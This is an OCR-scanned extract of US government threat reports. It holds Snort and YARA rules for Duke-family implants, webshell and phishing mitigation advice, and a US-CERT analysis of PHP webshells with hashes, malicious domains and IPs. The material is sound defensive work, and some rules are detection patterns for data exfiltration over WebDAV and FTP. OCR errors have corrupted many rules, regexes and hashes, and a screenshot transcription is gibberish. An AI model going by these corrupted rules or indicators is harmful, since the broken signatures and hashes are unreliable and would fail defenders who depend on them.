alert tcp $HOME_NET any -> $EXTERNAE_NET $HTTP_PORTS (msg: "MAE_REFERER"; 
flow:established,to_server; content:"GET"; http_method; content:"&bvm=bv.81"; fast_pattern; 
http_header; content:",d."; distanced; within:3; http_header; content:"IOD 0AI"; distance:3;within:2; 
http_header; content:!"Cookiel3A 201"; http_header; 

pcre:"/https:Wwww\.google\.comVurl\?sa=t&rct=j&q=&esrc=s&source=web&cd=(?:[0- 

9]l 10111 )&ved=0C [A-L] {2} QFjA[A-L]&url=[ A &] {1,512} &ei=[A-Za-zO-9] {20,22} &usg=[A-Za-z0- 

9 J {34} &bvm=bv\.81 [ 1 -7] {6 }\,d\. [A-Za-zO-9 J {3 }\x0d\x0a/D" ;sid: 1234;rev:2;) 


alert tcp any any -> any any (msg: "evil_twitter_callback"; content: "GET /api/asyncTwitter.php 
HTTP/1.1";) 
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The following YARA rules detect OnionDuke, referred to as IMPLANT 9 with rule naming convention. 


IMPLANT 9 Rules: 


Rule IMPLANT_9_vl 


strings: 

$STR1 = { 8B 03 8A 54 01 03 32 55 FF 41 88 54 39 FF 3B CE 72 EE } 

$STR2 = { 8B C8 83 El 03 8A 54 19 08 8B 4D 08 32 54 01 04 40 88 54 38 FF 3B C6 72 E7 } 

$STR3 = { 8B 55 F8 8B C8 83 El 03 8A 4C 11 08 8B 55 FC 32 0C 10 8B 17 88 4C 02 04 40 3B 06 
72 E3 } 

condition: 

(uintl6(0) == 0x5 A4D or uintl6(0)) and all of them 


The following Yara rule detects CozyDuke, CozyCar, CozyBear, referred to as IMPLANT 10 with rule 
naming convention. 


IMPLANT 10 Rules: 


Rule IMPLANT_10_vl 


strings: 

$MZ = "MZ" 

$STR1 = {33 ?? 83 F2 ?? 81 e2 ff 00 00 00} 

$STR2 = {Of be 14 01 33 dO ?? f2 [1-4] 81 e2 ff 00 00 00 66 89 [6] 40 83 f8 ?? 72} 
condition: 
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$MZ at 0 and ($STR1 or $STR2) 


Rule IMPLANT_10_v2 


strings: 

$MZ = "MZ" 


$xor = { 34 ?? 66 33 Cl 48 FF Cl } 

$nop = { 66 66 66 66 66 66 Of If 84 00 00 00 00 00} 
condition: 

$MZ at 0 and $xor and $nop 


Network Indicators for IMPLANT 10 


alert tcp any any -> any 80 (content: "=650&"; 

pcre: 7=11&[ A &] {1,7 }?=2[ A &] {6,12 }&[ A &] {1,7} ?=410&[ A &] {1,7} ?=650&[ A &] {1,7} 7=51 
HTTPV1U/"; msg:"CozyCar"; sid: 1;) 


alert tcp any any -> any 80 (content:".php? FfTTP"; content:"=12&"; distanced; 
pcre:7=12&[ A &=]{l,7}?=2[ A &=]{ 12,16}?==[ A &=]{ 18,26}?==/"; msg:"CozyCarv2"; sid:1234;) 


The following YARA rules detect MiniDuke, referred to as IMPLANT 11 with rule naming convention. 


IMPLANT 11 Rules: 


Rule IMPLANT_1 l_vl 
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strings: 

$STR1 = {63 74 00 00} //ct 
$STR2 = ( 72 6F 74 65} // rote 
$STR3 = {75 61 6C 50} // triV 
$STR4 = {56 69 72 74} // Plau 
$STR5 - { e8 00 00 00 00 } 

$STR6 = { 64 FF 35 00 00 00 00 } 

$STR7 = {D2 CO} 

$STR8 = 

Ax63\x74\x00\x00. {3,20 }\x72\x6F\x74\x65. {3,20 }\x75\x6 1\x6C\x50. {3,20 }\x56\x69\x72\x74/ 
condition: 

(uintl6(0) == 0x5 A4D) and #STR5 > 4 and all of them 


Network Indicators for IMPLANT 11 

alert tcp any any -> any 25 (msg:"MiniDuke-stringl_slide_l_l - new"; content:"IUgyYll"; 

pcre: "/IUgy Yll(\x0d\x0a) ?7t(\x0d\x0a) ? ?L(\x0d\x0a) 7?l(\x0d\x0a) ? ?N (\x0d\x0a) ??3 (\x0d\x0a) ? ?Q/";) 


alert tcp any any -> any 25 (msg:"MiniDuke-stringl_slide_l_2 - new"; content:"ltLlN3Q"; 
pcre:"/I(\x0d\x0a)??U(\x0d\x0a)??g(\x0d\x0a)??y(\x0d\x0a)??Y(\x0d\x0a)??l(\x0d\x0a)??ltLlN3Q/";) 


alert tcp any any -> any 25 (msg:"MiniDuke-stringl_slide_2_l - new"; content:"FIMmJZ"; 
pcre:7FIMmJZ(\x0d\x0a)??b(\x0d\x0a)??S(\x0d\x0a)??5(\x0d\x0a)??T(\x0d\x0a)??d(\x0d\x0a)??0/";) 


alert tcp any any -> any 25 (msg:"MiniDuke-stringl_slide_2_2 - new"; content:"bS5Td0"; 
pcre:'7F(\x0d\x0a)??I(\x0d\x0a)??M(\x0d\x0a)??m(\x0d\x0a)??J(\x0d\x0a)??Z(\x0d\x0a)??bS5Td0/";) 


alert tcp any any -> any 25 (msg:"MiniDuke-stringl_slide_3_l - new"; content:"hSDJiWW"; 
pcre:"/hSDJiWW(\x0d\x0a)??0(\x0d\x0a)??u(\x0d\x0a)??U(\x0d\x0a)??3(\x0d\x0a)??d(\x0d\x0a)??A/";) 


47 of 56 


TLP:WHITE 




TLP:WHITE 


alert tcp any any -> any 25 (msg:"MiniDuke-stringl_slide_3_2 - new"; content:"W0uU3dA"; 
pcre:"/h(\x0d\x0a)??S(\x0d\x0a)??D(\x0d\x0a)??J(\x0d\x0a)??i(\x0d\x0a)??W(\x0d\x0a)??W0uU3dA/";) 


alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_l_l - new"; content:"QDM0Zlo"; 
pcre:"/QDM0Zlo(\x0d\x0a)??3(\x0d\x0a)??R(\x0d\x0a)??V(\x0d\x0a)??t(\x0d\x0a)??w(\x0d\x0a)??X/";) 


alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_l_2 - new"; content:"o3RVtwX"; 
pcre:"/Q(\x0d\x0a)??D(\x0d\x0a)??M(\x0d\x0a)??0(\x0d\x0a)??Z(\x0d\x0a)??l(\x0d\x0a)??o3RVtwX/";) 


alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_2_l - new"; content:"AzNGZa"; 
pcre:"/AzNGZa(\x0d\x0a)??N(\x0d\x0a)??0(\x0d\x0a)??V(\x0d\x0a)??b(\x0d\x0a)??e(\x0d\x0a)??F/";) 


alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_2_2 - new"; content:"NOVbcF"; 
pere:"/A(\x0d\x0a)??z(\x0d\x0a)??N(\x0d\x0a)??G(\x0d\x0a)??Z(\x0d\x0a)??a(\x0d\x0a)??N0VbcF/";) 


alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_3_l - new"; content:"AMzRmWj"; 
pcre:"/AMzRmWj(\x0d\x0a)??d(\x0d\x0a)??F(\x0d\x0a)??W(\x0d\x0a)??3(\x0d\x0a)??B(\x0d\x0a)??c/"; 
) 


alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_3_2 - new"; content:"jdFW3Bc"; 
pcre: 7A(\x0d\x0a)??M(\x0d\x0a) ?7z(\x0d\x0a) ??R(\x0d\x0a) ??m(\x0d\x0a) ??W (\x0d\x0a) ??jdFW3Bc/"; 
) 


The following YARA rules detect CosmicDuke, referred to as IMPLANT 12 with rule naming 
convention. 


IMPLANT 12 Rules: 


Rule IMPLANT_12_vl 
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strings: 

$FUNC = {al [3-5] 33 c5 89 [2-3] 56 57 83 [4-6] 64} 
condition: 

(uint 16(0) == 0x5 A4D) and $FUNC 


Network Indicators for IMPLANT 12 


alert tcp any any -> any 80 (msg:"CosmicDuke HTTP Beacon"; content:"&BranchID="; 
pcre: "A?(?:mlmgn)\&Auth\=[a-zA-Z0-9] {8 }\&Session\=/";) 


alert tcp any any -> any 80 (msg:"CosmicDuke Webdav Exfil"; content: "PUT /catalog/outgoing/wd"; 
pcre: "/PUT VcatalogVoutgoingVwd[a-zA-Z0-9] {44 }\.bin/";) 


alert tcp any any -> any 21 (msg:"CosmicDuke FTP Exfil"; content:"STOR fp"; pcre:"/STOR fp[a-zA- 
Z0-9][44}\.bin/";) 
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APPENDIX C: Mitigations Guidance 

Defending Against Webshell Attacks 

Defend 

• Continually patch all webservers and all web components servicing the site, including PHP, 
Apache, IIS, and ColdFusion. Deploying a webshell typically requires adding to, or 
modifying, the code presented by the web server and is often accomplished via an exploit of 
a web server vulnerability. Patching all components that service the web server provides a 
substantial mitigation against most commonly known vulnerabilities. 

• Adhere to least privilege principles for server access and management. Through following 
the principle of least privilege, lateral movement and privilege escalation is made more 
challenging to an attacker by restricting access on the box and across the network. 

• Restrict write access to all folders that contain files served by the web server. All content 
served by the web server should be tightly controlled in such a way that only web 
administrator accounts can modify or add content. This would force an attacker to gain 
specific sets of credentials before they could add any malicious content to be delivered by the 
server. 

• Restrict access to all ports and administrative panels. Server ports are typically very 
predictable, and access to those ports should be constrained to only the services and users 
that require them. This will reduce the attack surface on the web server and supporting 
applications. 

• Deploy and configure Security-Enhanced Linux (SELinux) on supported Linux specific 
systems. SELinux has the capability to lock down web services such as Apache and can be 
configured to allow the service to access only certain directories. The administrators could 
possibly include /var/www/html, which contains the actual pages being served up. If a site 
has upload capabilities, then SELinux could help with least privilege by restricting read/write 
access on these folders as well. The web service already runs in a lower privilege context, but 
SELinux would also limit the file locations that it can actually access. This would prevent 
arbitrary file writes and possible malware uploads to areas that an admin would not normally 
detect. 

• Conduct regular vulnerability scans and establish a remediation strategy focusing on the most 
detrimental findings first. Regular scanning and remediation measures will remove 
opportunities to exploit known attack vectors by an adversary. 

• Deploy a Web Application Firewall (WAF). WAF technologies defend against common web 
exploitation techniques such as SQL injection and cross site scripting. Deploying this 
capability helps reduce the likelihood of a successful web attack on the server that could 
otherwise allow the perpetrator to modify code and deploy the webshell. 
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• Where third party products are integrated into the website (e.g., Adobe ColdFusion) ensure 
that the product is configured according to DoD or vendor published hardening best 
practices. 1 

Detect 

• Conduct regular log review. Key sources should include the network and host firewalls, 
Intrusion Prevention System, proxy, and local event logs. Events of interest should include 
high usage rates to suspicious IPs, odd timestamps on web files (dates that don’t match 
previous content updates), odd connections destined for internal networks, suspicious files in 
internet accessible locations, references to key words such as cmd.exe or eval. 4 Auditing 
should involve some kind of aggregator to store and secure the logs remotely. Even the best 
auditing on the web server is useless if the attacker can just manipulate or delete them once 
they have obtained control. The logs should be protected and regularly rolled up to a 
centralized location for integration into a security information and event management system. 

• Develop all content in an offline environment and maintain a hash list of all web files. 
Frequently compare the hashes of the files on the web server to the known good list 
maintained offline (an automated method is preferred). 

• Obtain regular full system backups (including snapshots if it is a virtual machine). 
Forensically the known good data that these can provide is extremely useful for detection. 
Having a copy of the filesystem before a compromise to compare against the post¬ 
compromise filesystem can be a benefit to any analysis. 

• Analyze traffic flows looking for certain anomalous behaviors such as prolonged 
connections, data frequently being pushed to the server (e.g., commands being sent to the 
shell), frequent large data transfers (an indication of data exfiltration), and abnormal 
encryption (anything that is not SSF/TFS or that negotiates using an alternate certificate) as 
indicators of potential nefarious activity. 2 

Contain 

• Internet facing web servers should be deployed to a DMZ. All traffic to internal networks 
from the DMZ should be significantly constrained and highly monitored. 

• Restrict outbound communications from the DMZ to all other networks. Communications 
originating in the DMZ destined for the internal network should be minimal at most (ideally 
this should never happen). An attacker who gains access to a web server in the DMZ should 
have no capability to leverage that access in order to gain direct additional access in the 
internal network. Web server communications to the internet should be restricted to http/https 
only. All other ports and protocols should be blocked. 


1 https://helpx.adobe.com/coldfusion/communitv-documentation/coldfusion-lockdown-guide.html 

2 https ://www.us-cert. gov/ncas/alerts/T A15-314A 
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• When a Domain Controller (DC) is necessary in the DMZ, it is recommended that a 
standalone DC and forest structure be deployed. Additionally, all accounts and resources in 
the DMZ instance should have no association or likeness to the internal network. 

• Ensure separation of admin accounts. The web admin account should not be the same admin 
account that is used elsewhere on the domain. 

Respond 

• When a compromise is found, reset all credentials associated with the Webserver (this may 
expand to all accounts in the DMZ if it is suspected that the compromise has expanded to the 
DC). This should include all user and service accounts, all domain accounts that have logged 
onto that host and all local accounts, to include the Kerberos master ticket granting ticket on 
the DC. Depending on the circumstances, it may also be necessary to take the suspected 
server(s) or network offline during the remediation process. 

• All server files should be wiped and restored from a known good source. The organization 
should prepare for a disaster recovery situation that includes a system compromise. Regular 
backups and offline storage of the data files should be made before being transferred to the 
DMZ production environment. 

• When all other response techniques have failed at remediating the suspected compromise, the 
server(s) should be completely rebuilt or replaced. All data reconstitution efforts should stem 
from a known good source (offline backup). 

Defending Against Spear Phishing Attacks 

Defend 

• Enforce application whitelisting on all endpoint workstations to prevent droppers or 
unauthorized software from gaining execution on endpoints. Many phishing attacks involve 
an executable that is dropped and installed on the victim’s machine. Application Whitelisting 
will allow the organization to monitor programs and allow only those that are on the 
approved whitelist to execute. This would help to stop the initial attack, even if the user has 
clicked the link or opened a malicious attachment. There are many baseline rulesets that 
come with the vendor product, but the organization should ensure that at least the user Temp 
directories are blocked for execution since this is where numerous phishing emails attempt to 
drop and execute malware. 

• Disable Macros in office products. Macros are a common method for executing code through 
an attached office document. Macros were often used as a means for initial exploitation in the 
late 1990s and early 2000s but have seen a recent resurgence in frequency of use. Some 
office products allow for the disabling of macros that originate from outside of the 
organization and can provide a hybrid approach when the organization depends on the 
legitimate use of macros. For Windows, specific settings can be configured to block Internet 
originated macros from running. This can be done in the Group Policy Administrative 
Templates for each of the associated Office products (specifically Word, Excel, and 
PowerPoint). For example, to enable the policy setting for Microsoft Word 2016, in the 
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Group Policy Management Editor, select: User Configuration > Administrative Templates 
> Microsoft Word 2016 > Word Options > Security > Trust Center > Block macros 
from running in Office files from the Internet 3 

• Utilize up to date web browsers on the network for increased security enhancements. These 
improvements may include a sandboxing feature that would allow the browser to contain any 
malicious content and protect the endpoint if an emailed link is clicked. 

• Deploy web and email filters on the network and configure these devices to scan for known 
bad domains, sources, and addresses; block these before messages are received and 
downloaded. This action will help to reduce the attack surface at the network’s first level of 
defense. In addition, attachments should be filtered. The network defenses should only allow 
approved extensions to pass through to the email client. Most .exe, scripting extensions 
(including .bat, .js, and .psl) and other executable extensions should be blocked. 

• Scan all emails, attachments, and downloads both on host and at the mail gateway with a 
reputable antivirus solution that includes cloud reputation services. Taking advantage of 
cloud reputation advancements provides rapid response capabilities and the integration of a 
broad base of cyber defense intelligence. 

• Organizations should ensure that they have disabled HTML from being used in emails, as 
well as disabling links. Everything should be forced to plain text. This will reduce the 
likelihood of potentially dangerous scripts or links being sent in the body of the email, and 
also will reduce the likelihood of a user just clicking something without thinking about it. 
With plain text, the user would have to go through the process of either typing in the link or 
copying and pasting. This additional step will allow the user an extra opportunity for thought 
and analysis before clicking on the link. 

• Establish a training mechanism to inform end users on proper email and web usage as well as 
common indicators of phishing to be aware of. This training should be done at least annually 
and should include a test that is scored and available for viewing by management and/or the 
IT Security department. The training should inform users what suspicious emails look like, 
what to do when they suspect phishing, as well as explain what they should post on any 
websites in terms of personally identifiable information (PII) that may be used for phishing 
campaigns (including email addresses, job titles, names, etc.). Consider real life interactive 
training simulations where users are sent suspicious emails on a semi regular basis and 
subsequently redirected to a phishing training site should they fail to adhere to the 
organization’s best practices and policies. 

Detect 

• Monitor event logs, email logs, and firewall logs for any indicators of a potential attack. 
These could include emails from suspicious domains, installation of programs on machines 


3 https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2Q16-can-block- 

macros-and-help-prevent-infection/ 
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that are unusual or not approved, unusual call outs to the internet from office products, non- 
smtp traffic from the email client, strange child processes under the parent office process, or 
spoofed domains sending or receiving traffic from the network. Strange Traffic/Behavior 
(e.g., Spamming others) should also be looked for in the various logs. This is a strong 
indicator that machine(s) are compromised in some way. 

• Using the antivirus software that is installed on the mailbox server and all of the clients, 
review the alerts and logs regularly for any activity on the network. The sooner detection can 
take place, the sooner remediation steps can start, and the amount of damage can be 
minimalized. 

• Users play an important role in the detection of spear phishing if they understand the proper 
reporting procedures of the organization. Users should be able to identify the correct 
handling and alerting procedure that the users should follow for any suspicious email they 
receive. 

• Using the logs from the organizations firewalls/filters/security devices/workstations, 
administrators should always ensure that their whitelisted and blacklisted domains are up to 
date. Admins should also check DoD blacklists for known bad domains and add these to their 
filters as well. Using these logs and lists, the organization may benefit from other incidents 
that have occurred to help in the future 

Contain 

• Utilize application containment products that can be used to prevent the downloading and 
propagation of malicious software on the network. If the organization is using some form of 
web email, the browser must be containerized. If the organization is using a program for 
email (e.g., Microsoft Outlook or Mozilla Thunderbird), then that program should be 
containerized for protection. The Application Containment will open the browser or email 
program in its own Virtual Machine and isolate it from the rest of the system. This allows the 
execution of potential malware in a sandboxed environment so the host system is protected. 

• Implement front and back end email servers when running on site instantiations of mail 
services. Having a front-end server allows the organization to have an extra layer of 
protection on the network since the front-end mailbox server contains no user data and allows 
a firewall to be placed before the back end server. This is also safer and more convenient for 
any web accessed email since web traffic is not being allowed directly into the network, 
protects from denial-of-service attacks, and authenticates requests before proxying them to 
the back end server. 4 

• Control where and when an administrator can log on, as well as what they can do when 
logged onto a system. This can minimize the damage of a spear phishing attack. Admins 
should never be allowed to browse the internet, nor should they be allowed to open any email 
program. This will reduce the likelihood of an accidental click or download of a program that 
could be malicious. This also will reduce the chances that a successful attacker will gain 


4 https://technet.microsoft.com/en-us/library/bb 124804(v=exchg.65).aspx 
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admin privileges immediately when they gain access to the system. Organizations can 
accomplish this restriction a number of ways, including application whitelisting, VLAN 
separation, dedicated administrator boxes, etc. 

• Ensure that standard user accounts are not a part of the local administrators group. The local 
administrator account should also be denied network access and all built in local 
administrator accounts should have a unique password value. It is a common tactic to look 
for local administrator credentials as a method of expanding access across the network. 
Making these values unique for each machine and denying that account network access 
removes the attacker’s capability to easily expand access using the same credentials 5 . 

Respond 

• If a phishing email is discovered or suspected, the organization needs to start their normal 
investigation procedures. It may be as simple as deleting that email and updating the email 
filter to prevent this address/domain from sending to the organization again, but it could also 
trigger a normal incident response. If the email contained a link that was clicked, an 
attachment that was downloaded, or a program that was executed, the organization may have 
to remove any malicious content, discover the extent of the possible spread, detail any 
exfiltration of data, or even remove the affected machine(s) or rebuild them. 

• Reset user credentials and all credentials associated with all compromised boxes. This should 
include services accounts and machine accounts as well as the supporting Kerberos tickets. 

• Monitor all accounts associated with the spear-phishing event. User accounts who are 
suspected to have been the victim of a successful phishing campaign should be forensically 
monitored for abnormal behaviors including unusual connections to non-standard resources, 
attempts to elevate privileges, enumeration behaviors on the local host machine as well as 
remote systems, and attempts to execute odd programs or applications. 


5 https://www.microsoft.com/en-us/download/details.aspx?id=36036 
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NCCIC 


US-CERT 



NATIONAL CYBERSECURITY AND COMMUNICATIONS INTEGRATION CENTER UNITED STATES COMPUTER EMERGENCY READINESS TEAM 


Malware Initial Findings Report (MIFR) - 10105049-Update2 
2017-01-23 


Notification 


This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties 
of any kind regarding any information contained within. The DHS does not endorse any commercial product or service, referenced in this 
bulletin or otherwise. 

This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no 
foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, 
TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see http://www.us-cert.gov/ 
«e/. 


Summary 

Description 

This report is an update to MIFR-10105049 and provides additional analysis of the artifacts identified in the NCCIC Joint Analysis Report 
(JAR 16-20296) dated December 19, 2016. 

The artifacts analyzed in this report include 17 PHP files, 3 executables and 1 RTF file. 


The PHP files are webshells designed to provide a remote user an interface for various remote operations. The rtf file is a malicious 
document designed to install and execute a malicious executable. 


Files 


Processed 


21 


10bi306f322a590b9cef4d023854b850 (0576cd0e9406e642c473cfa9cb67da4bc4963e0fd6811 bb09d328d71 b36faa09) 

128cc715b25d0e55704ed9b4a3f2ef55 (0fd05095e5d2fa466bef897105dd943de29f6b585ba68a7bf58148767364e73e) 

1 ec7f06f 1 ee4fa7cecd 17244eec24e07 (a0c00aca2f34c1f5ddcf36be2ccca4ce63b38436faf45f097d212c59d337a806) 

38f7149d4ec01509c3a36d4567125b 18 (7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf) 

617ba99be8a7d0771628344d209e9d8a (9f918fb741 e951 al0e68ce6874b839aef5a26d60486db31 e509f8dcaa13acec5) 
66948b04173b523ca773c3073afb506d (449e7a7cbc393ae353e8e18b5c31d17bb13235d0c07e9e319137543608749602) 
70f93f4f17d0e46137718fe59591 dafb (bd7996752cac5d05ed9d1 d4077ddf3abcb3d291321 c274dbcf10600ab45ad4e4) 
78abd4cdccab5462a64ab4908b6056bd (6fad670ac8febb5909be73c9f6b428179c6a7e94294e3e6e358c994500fcce46) 
7fce89d5e3d59d8e849d55d604b70a6f (2d5afec034705d2dc398f01 cl 00636d51 eb446f459f1 C2602512fd26e86368e4) 

81 f 1 af277010cb78755f08dfcc379ca6 (ac30321 be90e85f7eb1 ce7e211 b91 fed 1 d 1 fl 5b5d3235b9c1 e0dad683538cc8e) 

8f154d23ac2071 d7f179959aaba37ad5 (55058d3427ce932d8efcbe54dccf97c9a8d 1 e85c767814e34f4b2b6a6b305641) 
93f512e2d9d00bf0bcf1 e03c6898cb1 e (249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68db9749089f559ada4a33f93e) 
a5e933d849367d623d1f2692b6691bbf (7dac01e818bd5a01fe75c3324f6250e3f51977111d7b4a94e41307bf463f122e) 
ae7e3e531494b201 fbf6021066ddd 188 (9acba7e5f972cdd722541 a23ff314ea81 ac35d5c0c758eb708fb6e2cc4f598a0) 
bfcb50cffca601 b33c285b9f54b64cb1 (da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8) 
c3e23ef7f5e41796b80ca9e59990fe9c (20f76ada1721 b61963fa595e3a2006c96225351362b79d5d719197c190cd4239) 
dc4594dbeafbc8edfa0ac5983b295d9b (9376e20164145d9589e43c39c29be3a07ecdfd9c5c3225a69f712dc0ef9d757f) 
e80f92faa5e11007f9ffea6df2297993 (3bd682bb7870d5c8bc413cb4e0cc27e44b2358c8fc793b934c71b2a85b8169d7) 
eddfel 10da553a3dc721 e0ad4ea1 c95c (ae67c121 c7b81638a7cb655864d574f8a9e55e66bcb9a7b01f0719a05fab7975) 
f3ecf4c56f16d57b260b9cf6ec4519d6 (1343c905a9c8b0360c0665efa6af588161 fda76b9d09682aaf585df1851 ca751) 
fc45abdd5fb3ffa4d3799737b3f597f4 (d285115e97c02063836f1 cf8f91669c114052727c39bf4bd3c062ad5b3509e38) 


Domains 


Identified 


9 


private.directinvesting.com 

cderlearn.com 

wilcarobbe.com 

one2shoppee.com 

ritsoperrol.ru 

littjohnwilhap.ru 

insta.reduct.ru 

editprod. waterfilter. in .ua 

mymodule.waterfiiter.in.ua/system/logs/xtool.exe 
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IPs 

Identified 


5 

204.12.12.40 

209.236.67.159 

146.185.161.126 

176.114.0.120 

176.114.0.157 
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Files 


249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68db9749089f559ada4a33f93e 


Details 

Name 

Size 

Type 

MD5 

SHA1 


249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68db9749089f559ada4a33f93e 
21522 

PHP script, ASCII text, with very long lines, with CRLF, LF line terminators 
93f512e2d9d00bf0bcf1e03c6898cb1e 
b7c7446dc3c97909705899e3dcffc084081 b5c9f 


ssdeep 384:bx6Nx4A8ZPJ8s5o80bOls+AMBkxM5ZTSzuSizpxf18veznDt1Sxuunv:bx60A2PqsW8s7sMB/XTSfizpv+uunv 
Entropy 6.11147480451 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PH PAYP 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PHP.Agent.aar 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Avira 

PH P/Agent. 12663 

Microsoft 

BackdoonPHP/Fobushell.D 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Agent.lB trojan 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Backdoor. PHP. Fobushell 


Relationships 

(F) 

249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

(F) 

249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

(F) 

249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

(F) 

249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

(F) 

249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Description 

This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. 
During runtime, this payload will be decoded and decrypted using combination of a base64_decode and a password. 

Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


Related_To (S) Interface for PAS v.3.1.0 

(F) 

Related_To da9f2804b16b369156e1b629ad3d2aac79326b94 

284e43c7b8355f3db71912b8 (bfcb5) 

(F) 

Related_To 20f76ada 1721 b61963fa595e3a2006c962253513 

62b79d5d719197c190cd4239 (c3e23) 

(F) 

Related_To 7b28b9b85f9943342787bae1c92cab39c01f9d82b 

99eb8628abc638afd9eddaf (38f71) 

(F) 

Related_To ae67c121c7b81638a7cb655864d574f8a9e55e66 

bcb9a7b01f0719a05fab7975 (eddfe) 


The password "root" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S. 
v.3.1.0. This web-shell is a backdoor that provides an interface (see Screenshot) for various remote operations, such as file explorer, 
searcher, SQL-client, network tools, command shell access, and server info features to a remote user once installed on the compromised 
system. The following are some of the P.A.S webshell capabilities: 

-Begin Capabilities- 

To view compromised server information. 

File manager (copy, rename, move, download, upload, delete, jump, create files and folders). 

Search files, objects, directories, and text in files. 

SQL client to login and dump database and tables. 
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Network console to bindport, back-connect, and port scanner. 
Command line console to execute command. 

Execute PHP code. 

-End Capabilities- 


The webshell P.A.S. v.3.1.0 interface is shown in image 1.0. 

Screenshots 

• Interface for PAS v.3.1.0 


Wo4*ce: L>-v3efip«<3 ind«x: array in C:\ \ \ \foo\6.php on lino 3 

S «fv«f mMkm : localhotf <127.0.0.1, ::&) / W1N-49ATNURMMT 

Server OS : Wirvtow HT fe.i buAd 7601 (Wfnvteea 7 Buer.au Edtoon Service Px* 1) OBt> 

, t Apache ,-.4.10 <W«37) OpaeSJrt. J O.li PWT/S.4.3 cU«l rtySQt/rr, y*Qlr«J 5.0.11 -Oev • 20120903 • *ld: 

*° f373eaSddSS38761406eO022a4bOe37441M>240e $ 


1 Umt Milo : ud>0( 

> «n»-0<0) 





ptieplarT H f—rtfior 1 


r W—ndt fim] | CTO j [ 9mm <*>1 


Go to: A: C- D CJ ' 

_I T /W J 



iRsir^iri 

lump : C 1 ! 

tfoo\ 




Lxtc : Iwr - — 




_ 1 > 

_ 

rv.l : PhoMMIl 




i' * 

PJLS. v.3.1.0 


Uir -t 

Bls3 

19.52# A 


da9f2804b16b369156e1 b629ad3d2aac79326b94284e43c7b8355f3db71912b8 


Details 

Name da9f2804b16b369156e1 b629ad3d2aac79326b94284e43c7b8355f3db71912b8 
Size 21377 


Type 

MD5 

SHA1 


PHP script, ASCII text, with very long lines 

bfcb50cffca601b33c285b9f54b64cb1 

efccOd 8e10072b50deeca9592c76bc90f4d 18ce 


ssdeep 384:0x6Nx4A8ZPJ8s5o80bOls+AMBkxM5ZTSzuSizpxf18veznDt1Sxuunv:0x60A2PqsW8s7sMB/XTSfizpv+uunv 
Entropy 6.10042530063 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PH P.AYP 

VirIT 

Trojan.PHP.Shell.JB 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

Backdoor. PHP.Agent.aar 

TrendMicro 

PHP_WEBSHELL.SMA 

Sophos 

PHP/WebShell-O 

Microsoft 

Backdoor:PHP/Fobushell.D 

Ahnlab 

PHP/Webshell 

ESET 

PHP/Agent.lB trojan 

NANOAV 

Trojan.Script.Crypt.dsonvo 

TrendMicroHouseCall 

PHP_WEBSHELL.SMA 

Ikarus 

Trojan.PHP.Crypt 


Relationships 



(F) 


(F) 

da9f2804b16b369156e1b629ad3d2aac79326b94 
284e43c7b8355f3db71912b8 (bfcb5) 

Related_To 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Description 




This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. The 
password "avto" was used to decrypt the payload. The decrypted payload contains a PHP web-shell and has been identified as P.A.S. 
v.3.1.0. This file and 249ee048142d3d4b5f7ad15e8d4b98cf9491ee68db9749089f559ada4a33f93e have the same functionality. 


20f76ada1721 b61963fa595e3a2006c96225351362b79d5d719197c 190cd4239 
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Details 


Name 20f76ada1721 b61963fa595e3a2006c96225351362b79d5d719197c190cd4239 
Size 21377 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PHP script, ASCII text, with very long lines 
c3e23ef7f5e41796b80ca9e59990fe9c 
0a3f7e0d0729b648d7bb6839db13c97f0b741773 

384:JliH2ER39l1Vv+klPEWWjYc+CmJNHKblvcDSRRjqSA93DuxuXvWxUg:Jly2ER3CL+khWUYcsJtMcDiuSA93DuxD 

6.10091164773 


Antivirus 


F-prot 

PHP/WebShell.A 

McAfee 

PHP/WebShell.i 

F-secure 

Backdoor. PH PAYP 

VirIT 

Trojan.PHP.Shell.LV 

Symantec 

PHP.Backdoor.Trojan 

ClamAV 

Php.Malware.Agent-5486261-0 

Kaspersky 

